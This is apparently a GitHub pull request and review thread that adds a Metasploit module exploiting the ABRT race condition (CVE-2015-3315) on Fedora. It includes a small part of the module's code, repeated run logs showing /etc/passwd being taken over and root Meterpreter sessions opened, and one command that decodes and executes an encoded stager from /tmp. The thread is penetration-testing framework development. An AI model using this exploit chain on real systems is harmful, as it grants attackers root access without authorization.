### PR TITLE
Add ABRT raceabrt Privilege Escalation module

### PR DESCRIPTION
**Pull request by bcoles**
Add ABRT raceabrt Privilege Escalation module.

        This module attempts to gain root privileges on Fedora systems with
        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
        as the crash handler.

        A race condition allows local users to change ownership of arbitrary
        files (CVE-2015-3315). This module uses a symlink attack on
        '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
        then adds a new user with UID=0 GID=0 to gain root privileges.
        Winning the race could take a few minutes.

        This module has been tested successfully on ABRT packaged version
        2.2.1-1.fc19 on Fedora 19 x86_64 and 2.2.2-2.fc20 on Fedora 20 x86_64.
        Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.

## Verification

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use use exploit/linux/local/abrt_raceabrt_priv_esc`
- [x] `set SESSION <ID>`
- [x] `run`
- [x] **Verify** you get a *root* session

## Example Output

```
msf > use exploit/linux/local/abrt_raceabrt_priv_esc 
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.goXyr' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[+] Success! '/etc/passwd' is writable
[*] Adding MKaocvEj user to /etc/passwd ...
[*] Writing '/tmp/.YcrXQ7SwC' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:38280) at 2018-01-16 09:16:18 -0500
[+] Deleted /tmp/.goXyr
[+] Deleted /tmp/.YcrXQ7SwC

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

### CODE REVIEW

**Comment by h00die** [comment]
awesome.  This was the other module on my to do list that i started coding, and never got around to finishing.

Gave the code a once over, things like sane to me!

**Comment by bcoles** [comment]
@h00die cool. Yeah, I thought this might be the one you were referring to. The CVE references get [a little confusing](http://www.openwall.com/lists/oss-security/2015/04/16/12) between this issue and the issues exploited in #9399 .

I have a couple of concerns with this implementation.

Firstly, the use of `su - <username>` requires an interactive shell.

Second, it doesn't work on Meterpreter sessions. I haven't had time to investigate further, but most likely related to the `timeout`. `cmd_exec` does not appear to honor the `timeout` for whatever reason.

**Comment by bcoles** [comment]
Blocked on #9429 due to issues with Meterpreter sessions.

**Comment by bcoles** [comment]
Delayed pending #9438

**Comment by bcoles** [comment]
It looks like there's an issue with using `su -u <username>` in Meterpreter sessions which does not effect shell sessions.

File: modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,189 @@
...
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    if check != CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    chown_file = '/etc/passwd'
+    username = rand_text_alpha rand(7..10)
```
Comment (h00die) [inline modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb]: I'd like to see this be a non-required item.  During a pentest, it'd be good to set a static name across all exploited systems (like the pentest company name), or whatever a possible agreed upon flag may be.  If not given, rand it.

**Comment by h00die** [comment]
still need some docs on this, but this will be the next I test since I have some of those Fedoras laying around already

**Comment by h00die** [comment]
Fedora 20 worked for me!
```
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/abrt_raceabrt_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*]  The target service is running, but could not be validated.
msf exploit(linux/local/abrt_raceabrt_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.zbUQ4WFUQA' (64240 bytes) ...
[*] Max line length is 65537
[*] Writing 64240 bytes in 4 chunks of 55896 bytes (octal-encoded), using printf
[*] Next chunk is 49542 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 41969 bytes
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-02-20:16:49-18668.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:49-18670.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:49-18672.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18680.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18687.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18691.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18695.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18700.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:17:46-27026.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:17:46-27031.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 ubuntu abrt 1723 Jan 31 21:49 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding orrycKU user to /etc/passwd ...
[*] Switching to new user...
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[*] Writing '/tmp/.Zzjw1Y' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60038) at 2018-02-02 20:26:24 -0500
[+] Deleted /tmp/.zbUQ4WFUQA
[+] Deleted /tmp/.Zzjw1Y

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.workGroup
OS           : Fedora 20 (Linux 3.11.10-301.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

**Comment by h00die** [comment]
same box but via meterpreter (as you noted):
```
[*] Started reverse TCP handler on 192.168.2.117:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.V3rm7oX' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] (current) UNIX password: 
[-] Exploit aborted due to failure: unknown: Failed to own '/etc/passwd'
[*] Exploit completed, but no session was created.
```

**Comment by bcoles** [comment]
Thanks @h00die 

I got side tracked with other PRs and haven't come back to this one.

Regarding the username, I agree with your suggested use case and could easily change it to an Opt.

Unfortunately this module only works with shell sessions and not meterpreter sessions, due to the use of `su`. Taking a look through the framework I found at least two other instances where this issue occurred, causing developers to code around the framework, which isn't ideal.

Chatting with @busterb suggested implementing "subshell" functionality in meterpreter. This would require a bit of rework and probably won't be implemented any time soon.

**Comment by bcoles** [comment]
The easiest short term solution would be removing `meterpreter` as a supported session type. That's lame.

Another approach would be hard coding the payload as a meterpreter shell, the using `su` in `on_client_connect`. That's also lame.

This PR has been on the back-burner, and I've added the delayed tag, until I find a better approach.

`sudo` is not a viable approach in this instance, as the `sudoers` ownership is modified to `UID != 0`. No big loss - I generally prefer not to modify `sudoers` because reasons.

**Comment by bcoles** [comment]
@h00die are you using the latest Metasploit / Meterpreter from git? I just noticed the `(current) UNIX password:` in your output. That was due to bug #9438 in `cmd_exec` in Linux meterpreter / mettle which has since been fixed.

The exploit still fails on the latest version from git, but fails due to `su`. Failed exploitation on Meterpreter should look like this:

```
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.2.2-2.fc20
[*] Writing '/tmp/.vszljSpKz' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-03-13:23:19-91046.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-03-13:23:19-91048.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-03-13:23:19-91050.new, attempting to race...
[*] 	Didn't win, trying again!

<truncated for brevity>

[*] Detected ccpp-2018-02-03-13:25:24-101100.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 user abrt 2330 Jan 25 00:05 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding ktGKfJm user to /etc/passwd ...
[*] Switching to new user...
uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[-] Exploit aborted due to failure: unknown: Failed to gain root privileges
[*] Exploit completed, but no session was created.
```

**Comment by bcoles** [comment]
Fixed. I'll update shortly.

**Comment by bcoles** [comment]
Both shell and meterpreter sessions are now supported.

Unfortunately, `on_new_session` gets called, but none of the `shell_command_token` commands get executed, for reasons I haven't investigated, so the module doesn't clean up after itself.

**Comment by h00die** [comment]
so just waiting on docs and a retest then?

**Comment by bcoles** [comment]
@h00die yup. will commit shortly.

**Comment by bcoles** [comment]
@h00die Done. Should be good to go.

**Comment by h00die** [comment]
I dropped a mettle based on the most recent (-dev) buid, but it segfault core dumped.
```
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgCdWgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/QsBRs.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/EZWoT' < '/tmp/QsBRs.b64' ; chmod +x '/tmp/EZWoT' ; '/tmp/EZWoT' & sleep 2 ; rm -f '/tmp/EZWoT' ; rm -f '/tmp/QsBRs.b64'"
[-] Output: "/bin/sh: line 15: 18364 Segmentation fault      (core dumped) '/tmp/TpWef'"
```

Possible user error on this one, however I'm pretty OK to land this if anyone else will 2nd that (@busterb @wvu-r7 )

**Comment by busterb** [comment]
I don't think a segfault should ever be user-error other than mine :)  Will take a look, thanks!

**Comment by h00die** [comment]
@busterb do you want me to wait for that segfault to then test this on mettle, or just pass it since it works on shell and made it most the way (known issue) on mettle?  I think its good to land, but id also hesitate to land it if the mettle gem hasn't been push out yet (so others dont land in this odd situation)

**Comment by bcoles** [comment]
Mettle gem has been updated to 0.3.7 in master. It's still 0.3.6 in this branch.

**Comment by bcoles** [comment]
Is it possible you generated a mettle binary while on a branch with one version of the mettle gem, then used this module on a mettle session while running metasploit from a different branch with a different version of mettle?

**Comment by h00die** [comment]
worked after a rebase.
```
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.4TeRYgl' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-11-11:27:39-20254.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:39-20256.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:51-21725.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:51-21730.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 ragecyr abrt 1723 Jan 31 21:49 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding iFXRgyYR user to /etc/passwd ...
[*] Writing '/tmp/.PiopYAJ5' (207 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:55515) at 2018-02-11 11:27:54 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localGroup
OS           : Fedora 20 (Linux 3.11.10-301.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

**Comment by h00die** [comment]
# Release Notes
This PR adds a local priv escalation against Fedora due to a vulnerable ABRT crash reporter

**Pull request merged**